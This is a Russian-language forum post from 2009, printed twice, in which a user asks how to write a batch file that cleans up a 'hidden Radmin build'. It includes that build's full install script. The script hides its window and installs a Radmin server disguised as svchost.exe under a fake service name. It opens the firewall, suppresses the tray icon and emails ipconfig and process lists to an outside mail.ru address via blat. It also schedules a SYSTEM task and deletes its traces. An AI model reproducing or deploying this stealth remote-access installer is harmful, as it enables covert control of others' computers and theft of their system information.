the_apx
08.12.2009, 22:53
Как удалить установленную скрытую сборку Radmin'a bat файлом?
В bat файле установки стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.
А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из каталогов windows и system32? Тоесть автоматизировать это дело) Чтото вроде таблетки.
Буду весьма благодарен за помощь)
Текст bat файла сборки:
cmdow @ /HID
copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
%SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f user@mail.ru -u user -pw pass
ipconfig /all > %systemroot%/system32/ip.txt
tasklist > %systemroot%/system32/task.txt
blat.exe %systemroot%/system32/ip.txt -to user@mail.ru
blat.exe %systemroot%/system32/task.txt -to user@mail.ru
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat
del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat
В bat файле установки стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.
А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из каталогов windows и system32? Тоесть автоматизировать это дело) Чтото вроде таблетки.
Буду весьма благодарен за помощь)
Текст bat файла сборки:
cmdow @ /HID
copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
%SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f user@mail.ru -u user -pw pass
ipconfig /all > %systemroot%/system32/ip.txt
tasklist > %systemroot%/system32/task.txt
blat.exe %systemroot%/system32/ip.txt -to user@mail.ru
blat.exe %systemroot%/system32/task.txt -to user@mail.ru
schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat
del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat